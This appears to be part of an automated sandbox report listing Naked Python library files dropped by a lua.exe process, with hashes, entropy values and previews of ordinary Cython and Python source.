MD5:	7371D042C02BBAF2AA5A4E2EECCA1A0D
SHA1:	2CB21D7D2B68236EE0BEF331645F7DB3275C2F92
SHA-256:	2C4B59C2BC3D03A4F1E19FAD49FE248D22852D3C97F7BC6CE6EA0905C8AD07CC
SHA-512:	7C844E89B8F1C6E2FBBD4B84B9F226CA72520258D5F37E1DFA4DAF2C2F914B683D9F2953A09FD43BC58D1692351D7A477CBB62C440A57EB2D1467E5EB23E9F21
Malicious:	false
Preview:	python setup.py build_ext --inplace.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\casts.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	227012
Entropy (8bit):	5.109178694678501
Encrypted:	false
SSDEEP:	6144:k+KnpzScePDeev2bMP8RiCqeo1QZjFtWHEvurE8:9r9
MD5:	04524C30B8DA4D8A72342182234975EE
SHA1:	5E1C3317E1592FA95BF1E36A019B36A75352C6DD
SHA-256:	6E0123EC19AD29C1E631DD56E6A21C382F3F287E413FAEB3DF1FED2CC17837B2
SHA-512:	88D16F4D99ABE898BD96CE878EB6A9B702ED9CDB4A32B47447002A0811E942F8EDD48062CD257F18D317379378A09B273DAB17C8EAE508122121BF7B9F8941EB
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:13 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\casts.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4813
Entropy (8bit):	4.3828874593097655
Encrypted:	false
SSDEEP:	96:8v/+axtNfyuGLLGOJZ/pOn2d2ZgBDUxORT12BDvyth7:e/+avN6uGXGOz2jgFL12FUh7
MD5:	40CF5D8A05520D516347FBD4B4E2EE79
SHA1:	F5FC789EBC66E2897784EED8849FC15E8264CD23
SHA-256:	26AE96B77ADEEDF4B5FABCBDB83E01DFCC9F1A2F826F0871B0B665F07383362B
SHA-512:	DA479A715D5B4E372AA7BA972769AB66744076CCF2C5381DE16E88A48289DD735941B52FEFBB469736EC69E3F4AD22205362284F053D632C109BBABCC6E0C4AF
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=True..cdef inline int increment(object iterable, object test_string):. cdef int count = 0. cdef object thing. for thing in iterable:. if thing == test_string:. count += 1. return count..from Naked.toolshed.c.types import NakedObject, XFSet, XDict, XList, XQueue, XSet, XString.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [ nob ] (NakedObject).# Cast a dictionary of attributes to a NakedObject with key>attribute mapping.#------------------------------------------------------------------------------.def nob(attributes={}):. try:. return NakedObject(attributes). except Exception as e:. if DEBUG_FLAG:. print("Naked Framework Error: unable to create a NakedObject with the requested argument using the nobj() function (Naked.toolshed.casts.py)."). raise e..#----------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\cstate.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	134375
Entropy (8bit):	5.139015781875851
Encrypted:	false
SSDEEP:	3072:7sW9UHJPdoHYwETxs7HWyJDIOVFzqwB2l31GhiLD1wznuy95W+bzd1AhLOPCXCL8:NUHJPdoHYwETxs7HWyJDIOVFzqwB2l3F
MD5:	339F4F0E78560B3F10E355309107153F
SHA1:	615ED7C8C621F8E9F4B210655F27EACA42EB61A7
SHA-256:	A937BF7B8EA00AD19851D82DFBEBA51E5F4D684E13FCAEE3EC3E55F770146B00
SHA-512:	13D9F8F79B69E3F8601F83D2D9D965FA7857D0D3C72E647116976F6945151A325BB72EED5938A89F27C1C396F82AA2D0B24A0788547918B0C44274835B868849
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:16 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\cstate.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1089
Entropy (8bit):	4.880237201616399
Encrypted:	false
SSDEEP:	24:8cR5OALR9dVY58fAlQo/k3Xs+3CqoMAGXcmRJPf5kxUm2w8+vl+vnKWaT:8U0ALh+58fLo/+Xs8zAGXcoJPf5xm2ET
MD5:	5AF73C652D7032F60A7F395A2B52AC88
SHA1:	5A63D519915B7AFF53633C1F5537E43527FA1C31
SHA-256:	E440F10639DE28247213042C959B2908B9750368BB74CB4422ED667CCEF9AA9A
SHA-512:	14C96D68E4674BF8FDE911F293031547A5C4CFFAE5819C261A76A8AD1163D7C2AC3EA192C133583CF5A41B1DDD9382137CCACD978D5771BAE5CAE62D10F82428
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..from Naked.settings import debug as DEBUG_FLAG.from Naked.toolshed.c.system import cwd.import Naked.toolshed.c.python as py.import sys.import os.import datetime..class StateObject:..def __init__(self):...now = datetime.datetime.now()...self.py2 = py.is_py2() #truth test Python 2 interpreter...self.py3 = py.is_py3() #truth test Python 3 interpreter...self.py_major = py.py_major_version() #Python major version...self.py_minor = py.py_minor_version() #Python minor version...self.py_patch = py.py_patch_version() #Python patch version...self.os = sys.platform #user operating system...self.cwd = cwd() #current (present) working directory...self.parent_dir = os.pardir...self.default_path = os.defpath...self.user_path = os.path.expanduser("~")...self.string_encoding = sys.getdefaultencoding()...self.file_encoding = sys.getfilesystemencoding()...self.hour = now.hour...self.min = now.minute...self.year = now.year...self.day = now.d

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\cythonize.sh Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	256
Entropy (8bit):	4.2694332361377105
Encrypted:	false
SSDEEP:	6:Ejbir3lUU+y9suyvmrevQAvcUYLEvYX8a:EwVUU+yiuyerYvI4i8a
MD5:	10DA0E83902F49D49A125D2B985F10A9
SHA1:	D9BB203C12563A54243B81CEE96A293C0B390662
SHA-256:	F85CB9AB4A0C02A38A8F96850DF46E69050FA6A1AB2824836AD3DD16DD1DFF32
SHA-512:	C51270ED83CEFCA3338FB394CB97297A284BA6AE169DC4AE9CAC54E91CE61D89649476891E9AB55FEB38AB53EDC7BB57E9AE44ABC2DAE61BD4904801FC1814B2
Malicious:	false
Preview:	echo "Cythonizing .pyx files to C files"..cython benchmarking.pyx.cython casts.pyx.cython file.pyx.cython ink.pyx.cython network.pyx.cython python.pyx.cython shell.pyx.cython cstate.pyx.cython system.pyx.cython types.pyx...echo "Cythonization is complete".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\file.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	623270
Entropy (8bit):	4.9927811254669106
Encrypted:	false
SSDEEP:	6144:7uAuYuWuGuNu9uMufu8uuumukHguRqumfu5ISbIku/uuzIIuQMDI6u8jExkcI+uU:P
MD5:	4A76738433CB37EEEBA80FAA0F85368D
SHA1:	D309ABA37354AF3DA24E0BFA225DFD0BEFEBA460
SHA-256:	0ED2D7194E49CD22420F30BCB59C4CD24FEE71FDCE3707A9C41E90D5F8A92F52
SHA-512:	7D113AF5D43424B3AF67B09BFBE938F1CF22F8DABEA30B6D1CA1298C1EFD949173F16B0A911CB73AC19FE3B16BF2E0B514BF86974F92DBEC8168A77201248DD2
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:13 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\file.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19965
Entropy (8bit):	4.301083277627346
Encrypted:	false
SSDEEP:	192:iOSFvnSlqKoWFD1fg8OQzdk4sHzVO8r1uWFHOa1iCYhulbUkc/X:iOivSYAH3244T5N68C
MD5:	B7ABD0AB30C718F781BB9DE9D474449D
SHA1:	C7AAFF03C9A27A65A22309AD44944E5D79B704CA
SHA-256:	AEEDEBFBB415813B9B677B1B6CD3BF8EA174A3FA9F2416337C64973CBED7D7C7
SHA-512:	725942C4C5F274756427288E372E196028E182CAE38FAA5E889A594534C0C33B216CC4C486F425349654FD4C905D2C761F1298E5D789CC8453FB614CB706B37D
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..import sys.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [ IO class ].# interface for all local file IO classes.#------------------------------------------------------------------------------.class IO:. def __init__(self,filepath):. self.filepath = filepath..#------------------------------------------------------------------------------.# [ FileWriter class ].# writes data to local files.#------------------------------------------------------------------------------.class FileWriter(IO):. def __init__(self, filepath):. IO.__init__(self, filepath).. #------------------------------------------------------------------------------. # [ append method ]. # Universal text file writer that appends to existing file using system default text encoding or utf-8 if throws unicode error. # Tests: test_IO.py:: test_f

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\ink.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185313
Entropy (8bit):	5.124705018757957
Encrypted:	false
SSDEEP:	3072:JsWwsZuMaFudiHo+/D5H6CsJfIyuXqvg7Y5TcIwarajIju74Wd5fhh1kO/8N503c:usZuMaFudiH9/D5H6CsJfIyuXqvg7Y5R
MD5:	11135C86FBE9BE622A1D0B3955A2AEC2
SHA1:	862E7601C14EF885F54FB0DF8685325C06803D7D
SHA-256:	2F46EB375A03F9A8AB4CB155DFBF307E42D9EABD4C8001E8CEC9791A568C8DDA
SHA-512:	D2F493D7EB4D4A39CF0D7BDB29681D4617821306C254721E9F7DE6C3EE85C17BEE841A854976227BCC3F08D4549BD304A28A559E82C08F9C193B1C670CB725AB
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:14 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\ink.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5460
Entropy (8bit):	4.365772585042448
Encrypted:	false
SSDEEP:	96:8T1IrepFdlbKM3EivWIWEiElqUls9SLmzKM50ku:88M3vvWIY3507
MD5:	F0BA5AFE3A23D1682B19215F7D2D26D5
SHA1:	C513C0D4E312FAE601BA34EDBC68285BFC7C2024
SHA-256:	AFBDDBF0DE3A6E819AEC27ABC3CF2E3C693796E3505A0A04ED24B646EE24D32B
SHA-512:	D5794A38A1EDC81FECC9D3255939C9475EBD72A8FB1BE8B46DAB7DE11C5AE78DA9FF995BAE807C222744029307CEDC36B2D8A8E18197C8E8814CB7ACD519479E
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..#------------------------------------------------------------------------------.# The Ink Templating System.# A lightweight, fast, flexible text templating system.# Copyright 2014 Christopher Simpkins.# MIT License.#------------------------------------------------------------------------------.import re..#------------------------------------------------------------------------------.# Template class.# A template string class that is inherited from Python str.# Includes metadata about the template:.# odel = opening delimiter.# cdel = closing delimiter.# varlist = inclusive list of all variables in the template text (parsed in constructor).# Delimiters:.# default = {{variable}}.# assign new opening and closing delimiters as parameters when you make a new Template instance.# `escape_regex` boolean is a speedup, avoids Python escape of special regex chars if you do not need it.#------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\network.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	525661
Entropy (8bit):	5.001289473872488
Encrypted:	false
SSDEEP:	6144:RuXuN3uHug9uyGueumi6unVI5u1c3sx3INudSXcomsEKPbtTt4IKuWrGNk4mj/rO:59
MD5:	0B0BF4D82D8B66B87E98E6029FD5E42A
SHA1:	D5E9A92D938B3B40089A98E71DCC0C1E95238376
SHA-256:	7EDF9BAA7AF77ABBE9843D485E25CDF64AEA67A1893E62C0D8E76B1FD37C09A1
SHA-512:	2268C61D4315613D5793A2F47A9F45B08BADEA75D5E659204D4B2110DAC64EEE544585C3E221FE27D75A5F518A0A677AF6FF14A84C87302E329C90BB0EA59358
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:14 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\network.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19549
Entropy (8bit):	4.333578826016716
Encrypted:	false
SSDEEP:	192:iJ/GqPqvvWvH9pBE3O4cLtb3o4E/T16vMxv2Mvr8Bj4BoGaLtssQiT2sBGxhO:ipFSmVpa33c93o4gwKbABUBoGbsusBn
MD5:	D3AF924DFBA7EB2869EF86323C404CEE
SHA1:	58A6479CB06D0E0490624F16E68EC3BF492D764E
SHA-256:	F8D5FEED115B3760C0B0E756E26BED3589C23F51951F1F0242E6E62FBC236908
SHA-512:	0B68051B89877088F3D3F0644516AC83E8C8B3E92660152CF699EA9CC309238ABB2CBC179C6B0908ED3CBF2F75E2809ECA08D6A3FEE766B2E7833F4ACAD290B5
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..import sys.import requests.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.#[ HTTP class].# handle HTTP requests.# Uses the requests external library to handle HTTP requests and response object (available on PyPI).#------------------------------------------------------------------------------.class HTTP():. def __init__(self, url="", request_timeout=10):. self.url = url. self.request_timeout = request_timeout. #------------------------------------------------------------------------------. # HTTP response properties (assignment occurs with the HTTP request methods). #------------------------------------------------------------------------------. self.res = None # assigned with the requests external library response object after a HTTP method call.. #---------------------------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\python.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	111860
Entropy (8bit):	5.157470150033021
Encrypted:	false
SSDEEP:	3072:QsWB858YWIM6KMQWCws1ZxDhLOPCXCLZO:7M6KMQWCws1Z08
MD5:	6FB3A940141BF75699F0417FB2A62121
SHA1:	FA3F00BDCE27E38635099A3046A0E3E7BE86AA9C
SHA-256:	136AC0403AB5A5581E84CC0341E9CD1796592017696AE1CA0394CA14F5B10529
SHA-512:	DDCB72FA91C6022867D27A84D385630DCC3C468136F9567337B011373E6862F2D8C129142ABB7273548BFC5C53111E544326F9ED9F74790DC4C50B327456CD06
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:15 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\python.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2157
Entropy (8bit):	3.31195971890696
Encrypted:	false
SSDEEP:	24:8cR59Wyma9wpwQKPJKFJgpwsUYKZ+pwPhnRhYKqFRvpw2J1BXdpwJ/C1BlwmaT:8UjmatQUKF1OKZBPDiKq7WAXdeOCmaT
MD5:	DF45DD100246A63C4556286D0D8DDE7B
SHA1:	AE259CBFE67DF3D093A766F82E83CF3AF5BD58A6
SHA-256:	593493E65615AA2CC2B405DB1D9A9DE4718E3BDCB0082C4FF1D6F32C1DAD6DC3
SHA-512:	F7E7BFA34E212AED221F66FD4D637F620A57B69B2A6141B96C0C04141EC01031D823D8F7517655A9ED8ACE7CA356CF5621A2A58BB0B2F216C4BB9FDDC7EB8CCF
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=True..from sys import version_info..#------------------------------------------------------------------------------.# Python Versions.#------------------------------------------------------------------------------..#------------------------------------------------------------------------------.# [ py_version function ] (tuple of (major, minor, patch)).#------------------------------------------------------------------------------.def py_version():..return (version_info[0], version_info[1], version_info[2])..#------------------------------------------------------------------------------.# [ py_major_version function ] (integer).# Return Python interpreter major version number.#------------------------------------------------------------------------------.def py_major_version():..return (version_info[0])..#------------------------------------------------------------------------------.# [ py_minor_version function ] (integer).#

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\setup.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	654
Entropy (8bit):	4.615610772735726
Encrypted:	false
SSDEEP:	12:1BNMdhwNMRleu6ypAyU4PT03ZMVT/YB0TVFT+FSeXcGTGWl4TdG4tEYTzoS6TleO:1BNM4MT6JT+g3Z++0THeBFl4vtXnoX5x
MD5:	9767B207528D4A7E34427E2BB49FC12A
SHA1:	1F1410E511BD9849D3287E3820C7078E20D1D57C
SHA-256:	A0EB9EAFC27566A271C56857898CE6B4F9B279A432D85350369D5CF7D0331785
SHA-512:	93C4C4E7584749ADE6D398CE50C5CA523BEF27B7A043C7A8B979A5203B9300E185726FEFF8ECE6DB9937394D1D0391DBB671165C55DCC3AF1A0544EB1AD030DD
Malicious:	false
Preview:	from distutils.core import setup.from distutils.extension import Extension..ext_bench = Extension("benchmarking", ["benchmarking.c"]).ext_casts = Extension("casts", ["casts.c"]).ext_file = Extension("file", ["file.c"]).ext_ink = Extension("ink", ["ink.c"]).ext_net = Extension("network", ["network.c"]).ext_py = Extension("python", ["python.c"]).ext_shell = Extension("shell", ["shell.c"]).ext_state = Extension("cstate", ["cstate.c"]).ext_sys = Extension("system", ["system.c"]).ext_types = Extension("types", ["types.c"])...setup(. ext_modules = [ext_bench, ext_casts, ext_file, ext_ink, ext_net, ext_py, ext_shell, ext_state, ext_sys, ext_types].).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\shell.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	376470
Entropy (8bit):	5.0897509615893535
Encrypted:	false
SSDEEP:	6144:DJYM+ecIDyBu8u2uioMDrhy9T9n422LAzEMiEyQX/sZxxCQDYM2PiFWrpDKhJMR8:U6a9
MD5:	3F514FAC00F1C07D07519D6933922FF5
SHA1:	0690D457FA51D3F1BAD6B4D784EE9F43D30F6822
SHA-256:	D42AE0770510B07924CCA2AF5587E666803A39A1B6DF1AAB88A88ED1AFEC79C2
SHA-512:	8E43E832D77825F3C50590920C029B687A9FFB3E8C588F05291E65A6F67D00B5E7E549483E9B2B72C2FA49D8AA95E7400049C21C5DD838D80CA3CD4F2E22A733
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:15 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\shell.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12629
Entropy (8bit):	4.365234100349405
Encrypted:	false
SSDEEP:	192:LmWeDFtGhocSh5XeveiWUFGUPS4U49t/q/lom9odaidolQi+lzmA1z2e5Tz:LFeDHG+ccONCSbS/lokoXolelzHnz
MD5:	3447F1A7040248DD5E52F5084000CEE4
SHA1:	54A6CAF500F222766D44D6694A79439708C2C470
SHA-256:	79FA6F9E74FC72EEB15CE1AF86A7763293028AFD99E046AEF158D1A7DA406127
SHA-512:	A3A08F54D93CF5FCC7A5FDD3EE1533E47678B8C4904C17CB9693C3300BB076F682B7BF75A9C7DDB2F72F3487D3609A9D9B3F81F41E7F354BB1BD4213802653E8
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..import os.import sys.import subprocess.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [ execute function ] (boolean).# run a shell command and print std out / std err to terminal.# returns True if exit status = 0.# returns False if exit status != 0.#------------------------------------------------------------------------------.def execute(command):. try:. response = subprocess.call(command, shell=True). if response == 0:. return True. else:. return False. except subprocess.CalledProcessError as cpe:. try:. sys.stderr.write(cpe.output). except TypeError as te:. sys.stderr.write(str(cpe.output)). except Exception as e:. if DEBUG_FLAG:. sys.stderr.write("Naked Framework Error: unable to run the shell command with the execute() function

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\system.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	620280
Entropy (8bit):	5.110617689524457
Encrypted:	false
SSDEEP:	6144:xYNIp9+zlh6GE8Nw/9c7iDr/ckrGdVIz0jYIcfT4MseeIxHeHPP1VqvPjhfywT0h:zk
MD5:	BAB1835F5CE2BCDBE7F124C15D290D77
SHA1:	1FD6F139680C8CB386C52310EC6FF9DABA634C3D
SHA-256:	6D245FB9865EF02E67224D9666B7179B979878967EDCEC03E60CF1DA3C143ED1
SHA-512:	04EBC7C94F2F9374068B074DEA9F9E54C2F83A1C2C6286613B09F61D95B3E8CDC5DD3247EC8BE616BC173C85BE04A77F23A706E38CFA8F21B184A0ECE970691B
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:16 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\system.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24684
Entropy (8bit):	4.225348006273285
Encrypted:	false
SSDEEP:	384:iB+gHg0+g6u0NZCEhZv+BlbXlgVo/RmiCS:inA0+g6uyXhZmBlbXMiN
MD5:	F4FAE281D914B290101199F3966900C9
SHA1:	EBC3C2EE2E7687D3136EE55DF2C1F7A4E8D2426D
SHA-256:	6CF8C27319162EE4BE5F90998140BC4648A5736C7E4BE5F67BD324BF311FFB1C
